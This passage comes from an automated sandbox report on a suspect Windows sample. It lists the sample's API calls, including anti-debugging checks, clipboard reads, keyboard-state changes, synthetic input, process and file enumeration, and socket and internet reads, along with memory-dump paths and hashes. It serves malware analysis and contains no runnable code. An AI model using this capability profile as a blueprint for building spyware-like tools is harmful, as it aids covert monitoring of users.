                                                                                                                  • Associated: 00000000.00000002.2062423933.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062445006.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062445006.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062487236.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_400000_9L83v5j083.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: ErrorLast$closesocket$bindlistensocket
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 540024437-0
                                                                                                                  • Opcode ID: 56b395d1b7441155ee1d78469f99a9871a9e2360f64803e3ab449944eb02724f
                                                                                                                  • Instruction ID: 689f190a2b8ca197395c4559ba4ec64c13dad074e2778b61c05f6be918bdb8b0
                                                                                                                  • Opcode Fuzzy Hash: 56b395d1b7441155ee1d78469f99a9871a9e2360f64803e3ab449944eb02724f
                                                                                                                  • Instruction Fuzzy Hash: A8319331200500ABD310EF25DD89B6EB7A8EF44725F10866EF855E73D1DBB4AC818B99
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2062325346.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2062305492.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062380054.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062404825.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062423933.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062445006.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062445006.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062487236.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_400000_9L83v5j083.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID: ERCP$VUUU$VUUU$VUUU$XjH
                                                                                                                  • API String ID: 0-2872873767
                                                                                                                  • Opcode ID: 34fecdbc504fccc055e136d4951117c2a740426f4eee1b738e863fbded63ce7f
                                                                                                                  • Instruction ID: d175e7d0ae6fb3d700f9da8fb6b70819649eb02c4ceaf458d011f7582104736e
                                                                                                                  • Opcode Fuzzy Hash: 34fecdbc504fccc055e136d4951117c2a740426f4eee1b738e863fbded63ce7f
                                                                                                                  • Instruction Fuzzy Hash: D772D871A042198BEF24CF58C8807AEB7F1EB42314F25829BD859A7380D7799DC5CF5A
                                                                                                                  APIs
                                                                                                                  • CreateToolhelp32Snapshot.KERNEL32 ref: 00475608
                                                                                                                  • Process32FirstW.KERNEL32(00000000,0000022C), ref: 00475618
                                                                                                                  • __wsplitpath.LIBCMT ref: 00475644
                                                                                                                    • Part of subcall function 00413A0E: __wsplitpath_helper.LIBCMT ref: 00413A50
                                                                                                                  • _wcscat.LIBCMT ref: 00475657
                                                                                                                  • __wcsicoll.LIBCMT ref: 0047567B
                                                                                                                  • Process32NextW.KERNEL32(00000000,?), ref: 004756AB
                                                                                                                  • CloseHandle.KERNEL32(00000000), ref: 004756BA
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2062325346.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2062305492.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062380054.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062404825.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062423933.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062445006.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062445006.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062487236.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_400000_9L83v5j083.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32__wcsicoll__wsplitpath__wsplitpath_helper_wcscat
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 2547909840-0
                                                                                                                  • Opcode ID: 9e44ac92eedd99fdf3f2932738b6949334d3f24a3592eb41664da5fdf167909f
                                                                                                                  • Instruction ID: 52239f647ae7113ca4c6e3167181772f82882466072c53a1302db900a9aecbbd
                                                                                                                  • Opcode Fuzzy Hash: 9e44ac92eedd99fdf3f2932738b6949334d3f24a3592eb41664da5fdf167909f
                                                                                                                  • Instruction Fuzzy Hash: B3518671900618ABDB10DF55CD85FDE77B8EF44704F1084AAF509AB282DA75AF84CF68
                                                                                                                  APIs
                                                                                                                    • Part of subcall function 00401B10: _wcslen.LIBCMT ref: 00401B11
                                                                                                                    • Part of subcall function 00401B10: _memmove.LIBCMT ref: 00401B57
                                                                                                                  • FindFirstFileW.KERNEL32(?,?), ref: 004524DF
                                                                                                                  • Sleep.KERNEL32(0000000A), ref: 0045250B
                                                                                                                  • FindNextFileW.KERNEL32(?,?), ref: 004525E9
                                                                                                                  • FindClose.KERNEL32(?), ref: 004525FF
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2062325346.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2062305492.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062380054.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062404825.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062423933.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062445006.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062445006.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062487236.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_400000_9L83v5j083.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: Find$File$CloseFirstNextSleep_memmove_wcslen
                                                                                                                  • String ID: *.*$\VH
                                                                                                                  • API String ID: 2786137511-2657498754
                                                                                                                  • Opcode ID: 952b61541a12346a9a2631e93aef0720ba9757898c7ad2f9180af277910d7a38
                                                                                                                  • Instruction ID: de376bcde865418ddd8e10142a6165d1fec8b8ecf5afc9fd422e88b207ce0255
                                                                                                                  • Opcode Fuzzy Hash: 952b61541a12346a9a2631e93aef0720ba9757898c7ad2f9180af277910d7a38
                                                                                                                  • Instruction Fuzzy Hash: 37417F7190021DABDB14DF64CD58AEE77B4AF49305F14445BEC09A3281E678EE49CB98
                                                                                                                  APIs
                                                                                                                  • IsDebuggerPresent.KERNEL32 ref: 00421FC1
                                                                                                                  • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 00421FD6
                                                                                                                  • UnhandledExceptionFilter.KERNEL32(pqI), ref: 00421FE1
                                                                                                                  • GetCurrentProcess.KERNEL32(C0000409), ref: 00421FFD
                                                                                                                  • TerminateProcess.KERNEL32(00000000), ref: 00422004
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2062325346.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2062305492.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062380054.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062404825.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062423933.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062445006.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062445006.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062487236.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_400000_9L83v5j083.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: ExceptionFilterProcessUnhandled$CurrentDebuggerPresentTerminate
                                                                                                                  • String ID: pqI
                                                                                                                  • API String ID: 2579439406-2459173057
                                                                                                                  • Opcode ID: 25dc777f16e4295b66819c01749bb17431433dcbcd396824bac5e12fb106518c
                                                                                                                  • Instruction ID: 2caf929301e55fbdfba35cdc3931bb3174c20cf3198a7c5bb5494214f042e870
                                                                                                                  • Opcode Fuzzy Hash: 25dc777f16e4295b66819c01749bb17431433dcbcd396824bac5e12fb106518c
                                                                                                                  • Instruction Fuzzy Hash: 9E21CDB45392059FCB50DF65FE456483BA4BB68304F5005BBF90987371E7B969818F0D
                                                                                                                  APIs
                                                                                                                  • __wcsicoll.LIBCMT ref: 00433349
                                                                                                                  • mouse_event.USER32(00000800,00000000,00000000,00000078,00000000), ref: 0043335F
                                                                                                                  • __wcsicoll.LIBCMT ref: 00433375
                                                                                                                  • mouse_event.USER32(00000800,00000000,00000000,00000088,00000000), ref: 0043338B
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2062325346.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2062305492.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062380054.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062404825.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062423933.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062445006.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062445006.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062487236.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_400000_9L83v5j083.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: __wcsicollmouse_event
                                                                                                                  • String ID: DOWN
                                                                                                                  • API String ID: 1033544147-711622031
                                                                                                                  • Opcode ID: 3af7a305a716ba131119f47d61043d9bc75f7fbd5de0530911e4e2de0579c383
                                                                                                                  • Instruction ID: c5effa3e7e2998e6ee15a8e10ce6e2e5d36a5fc043d4170c53cc9f091e4fe068
                                                                                                                  • Opcode Fuzzy Hash: 3af7a305a716ba131119f47d61043d9bc75f7fbd5de0530911e4e2de0579c383
                                                                                                                  • Instruction Fuzzy Hash: 78F0A0726846103AF80026947C02EFB334C9B26767F004023FE0CD1280EA59290557BD
                                                                                                                  APIs
                                                                                                                  • GetKeyboardState.USER32(?), ref: 0044C3D2
                                                                                                                  • SetKeyboardState.USER32(00000080), ref: 0044C3F6
                                                                                                                  • PostMessageW.USER32(00000000,00000101,?,?), ref: 0044C43A
                                                                                                                  • PostMessageW.USER32(00000000,00000105,?,?), ref: 0044C472
                                                                                                                  • SendInput.USER32(00000001,?,0000001C), ref: 0044C4FF
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2062325346.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2062305492.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062380054.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062404825.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062423933.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062445006.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062445006.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062487236.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_400000_9L83v5j083.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: KeyboardMessagePostState$InputSend
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 3031425849-0
                                                                                                                  • Opcode ID: 0ab52cc7f1a00f618f34bf6b1006ae93bda3478e58ada741bb1ac89fd44d8d1c
                                                                                                                  • Instruction ID: ca9f4cb769efad0e1be190fe8763212e5a79bd7c4ee8908ff6f5a5d8a4a0dc9b
                                                                                                                  • Opcode Fuzzy Hash: 0ab52cc7f1a00f618f34bf6b1006ae93bda3478e58ada741bb1ac89fd44d8d1c
                                                                                                                  • Instruction Fuzzy Hash: 4D415D755001082AEB109FA9DCD5BFFBB68AF96320F04815BFD8456283C378D9518BF8
                                                                                                                  APIs
                                                                                                                    • Part of subcall function 00465225: inet_addr.WSOCK32(?), ref: 00465249
                                                                                                                  • socket.WSOCK32(00000002,00000002,00000011,?,00000000), ref: 0047666F
                                                                                                                  • WSAGetLastError.WSOCK32(00000000), ref: 00476692
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2062325346.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2062305492.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062380054.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062404825.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062423933.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062445006.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062445006.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062487236.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_400000_9L83v5j083.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: ErrorLastinet_addrsocket
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 4170576061-0
                                                                                                                  • Opcode ID: beba4ad3326242fe02a37a331f69581919bdb462f679bf8c0e3d41d719e28549
                                                                                                                  • Instruction ID: b6cffcacb6afaf0b8cd9bee7f3c7ce362d61c656181a10c6507bcc72ef542d5a
                                                                                                                  • Opcode Fuzzy Hash: beba4ad3326242fe02a37a331f69581919bdb462f679bf8c0e3d41d719e28549
                                                                                                                  • Instruction Fuzzy Hash: 604129326002005BD710EF39DC86F5A73D59F44728F15866FF944AB3C2DABAEC418799
                                                                                                                  APIs
                                                                                                                    • Part of subcall function 0046F3C1: IsWindow.USER32(00000000), ref: 0046F3F1
                                                                                                                  • IsWindowVisible.USER32 ref: 0047A368
                                                                                                                  • IsWindowEnabled.USER32 ref: 0047A378
                                                                                                                  • GetForegroundWindow.USER32(?,?,?,00000001), ref: 0047A385
                                                                                                                  • IsIconic.USER32 ref: 0047A393
                                                                                                                  • IsZoomed.USER32 ref: 0047A3A1
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2062325346.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2062305492.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062380054.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062404825.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062423933.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062445006.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062445006.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062487236.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_400000_9L83v5j083.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: Window$EnabledForegroundIconicVisibleZoomed
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 292994002-0
                                                                                                                  • Opcode ID: 0a48a302b729025e65be405b7f5f19fe679dbad6397f14c7d9a4bdd7ec3e43df
                                                                                                                  • Instruction ID: 143e3079ffab126fd184b85051f6534cdea6adf6d01d93e69c1b4810180b6228
                                                                                                                  • Opcode Fuzzy Hash: 0a48a302b729025e65be405b7f5f19fe679dbad6397f14c7d9a4bdd7ec3e43df
                                                                                                                  • Instruction Fuzzy Hash: 8F11A2322001119BE3219F2ADC05B9FB798AF80715F15842FF849E7250DBB8E85187A9
                                                                                                                  APIs
                                                                                                                    • Part of subcall function 004426CD: _wcslen.LIBCMT ref: 004426F9
                                                                                                                  • CoInitialize.OLE32(00000000), ref: 00478442
                                                                                                                  • CoCreateInstance.OLE32(00482A08,00000000,00000001,004828A8,?), ref: 0047845B
                                                                                                                  • CoUninitialize.OLE32 ref: 0047863C
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2062325346.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2062305492.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062380054.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062404825.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062423933.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062445006.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062445006.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062487236.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_400000_9L83v5j083.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: CreateInitializeInstanceUninitialize_wcslen
                                                                                                                  • String ID: .lnk
                                                                                                                  • API String ID: 886957087-24824748
                                                                                                                  • Opcode ID: 9da8986f0495ca00a6a2a6dbfcf51f3daa57ac4e6f9732571e53b5c4becaddd7
                                                                                                                  • Instruction ID: cf4755465b87a828534c2837f83e1451e93ee4f6fe559e45c0b7480b45348b92
                                                                                                                  • Opcode Fuzzy Hash: 9da8986f0495ca00a6a2a6dbfcf51f3daa57ac4e6f9732571e53b5c4becaddd7
                                                                                                                  • Instruction Fuzzy Hash: 17816D70344301AFD210EB54CC82F5AB3E5AFC8B18F10896EF658DB2D1DAB5E945CB96
                                                                                                                  APIs
                                                                                                                  • OpenClipboard.USER32(?), ref: 0046DCE7
                                                                                                                  • IsClipboardFormatAvailable.USER32(0000000D), ref: 0046DCF5
                                                                                                                  • GetClipboardData.USER32(0000000D), ref: 0046DD01
                                                                                                                  • CloseClipboard.USER32 ref: 0046DD0D
                                                                                                                  • GlobalLock.KERNEL32(00000000), ref: 0046DD37
                                                                                                                  • CloseClipboard.USER32 ref: 0046DD41
                                                                                                                  • IsClipboardFormatAvailable.USER32(00000001), ref: 0046DD81
                                                                                                                  • GetClipboardData.USER32(00000001), ref: 0046DD8D
                                                                                                                  • CloseClipboard.USER32 ref: 0046DD99
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2062325346.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2062305492.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062380054.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062404825.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062423933.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062445006.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062445006.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062487236.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_400000_9L83v5j083.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: Clipboard$Close$AvailableDataFormat$GlobalLockOpen
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 15083398-0
                                                                                                                  • Opcode ID: 15add7cba21d4e7b0994eb4f29ae7fc89ecef22f443925247f1b4e4ac981ab14
                                                                                                                  • Instruction ID: df02eb04a95629b292fb88db9571ebb8a4b5ed240788a0c572d8156b6d3d2bc0
                                                                                                                  • Opcode Fuzzy Hash: 15add7cba21d4e7b0994eb4f29ae7fc89ecef22f443925247f1b4e4ac981ab14
                                                                                                                  • Instruction Fuzzy Hash: 1A0128326042416BC311BBB99C8596E7B64EF4A324F04097FF984A72C1EB74A912C3A9
                                                                                                                  APIs
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2062325346.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2062305492.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062380054.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062404825.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062423933.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062445006.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062445006.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062487236.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_400000_9L83v5j083.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: _memmove
                                                                                                                  • String ID: U$\
                                                                                                                  • API String ID: 4104443479-100911408
                                                                                                                  • Opcode ID: 8409e1e1a3b6e8568ef346b3eec2e6609d783923d36277a6c09bfee55c093031
                                                                                                                  • Instruction ID: 961864e7757f6edfa256f53df2fe8495351bb1c33360f7104140ceff5b52ad59
                                                                                                                  • Opcode Fuzzy Hash: 8409e1e1a3b6e8568ef346b3eec2e6609d783923d36277a6c09bfee55c093031
                                                                                                                  • Instruction Fuzzy Hash: 7002A070E002499FEF28CF69C4907AEBBF2AF95304F2481AED45297381D7396D4ACB55
                                                                                                                  APIs
                                                                                                                  • FindFirstFileW.KERNEL32(00000000,?,?), ref: 0045CB1F
                                                                                                                  • FindNextFileW.KERNEL32(00000000,?), ref: 0045CB7C
                                                                                                                  • FindClose.KERNEL32(00000000,00000001,00000000), ref: 0045CBAB
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2062325346.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2062305492.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062380054.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062404825.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062423933.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062445006.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062445006.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062487236.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_400000_9L83v5j083.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: Find$File$CloseFirstNext
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 3541575487-0
                                                                                                                  • Opcode ID: b82a98c6df9a243ef4fbf3c667c5144d50f68704456ba494e21579813087d3e5
                                                                                                                  • Instruction ID: f333144462bda28c064cc07c1e05bb1389ec512a64b809c533c1c3d7cc497df0
                                                                                                                  • Opcode Fuzzy Hash: b82a98c6df9a243ef4fbf3c667c5144d50f68704456ba494e21579813087d3e5
                                                                                                                  • Instruction Fuzzy Hash: 6741DF716003019FC710EF69D881A9BB3E5FF89315F108A6EE9698B351DB75F844CB94
                                                                                                                  APIs
                                                                                                                  • InternetQueryDataAvailable.WININET(?,?,00000000,00000000), ref: 0044231E
                                                                                                                  • InternetReadFile.WININET(?,00000000,?,?), ref: 00442356
                                                                                                                    • Part of subcall function 004422CB: GetLastError.KERNEL32 ref: 004422E1
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2062325346.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2062305492.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062380054.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062404825.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062423933.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062445006.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062445006.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062487236.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_400000_9L83v5j083.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: Internet$AvailableDataErrorFileLastQueryRead
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 901099227-0
                                                                                                                  • Opcode ID: 97c0115689459c5170db59d582b95bf639c465a717fdad7c54a0526a5dec2c32
                                                                                                                  • Instruction ID: 2cb050104b41b6b223ad4d4b8d529f91c68f3ac810c45c6f1fc1690b5501c343
                                                                                                                  • Opcode Fuzzy Hash: 97c0115689459c5170db59d582b95bf639c465a717fdad7c54a0526a5dec2c32
                                                                                                                  • Instruction Fuzzy Hash: B32174752002047BFB10DE26DC41FAB73A8EB54765F40C42BFE059A141D6B8E5458BA5
                                                                                                                  APIs
                                                                                                                  • DefDlgProcW.USER32(?,?,?,?), ref: 0047EA9E
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2062325346.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
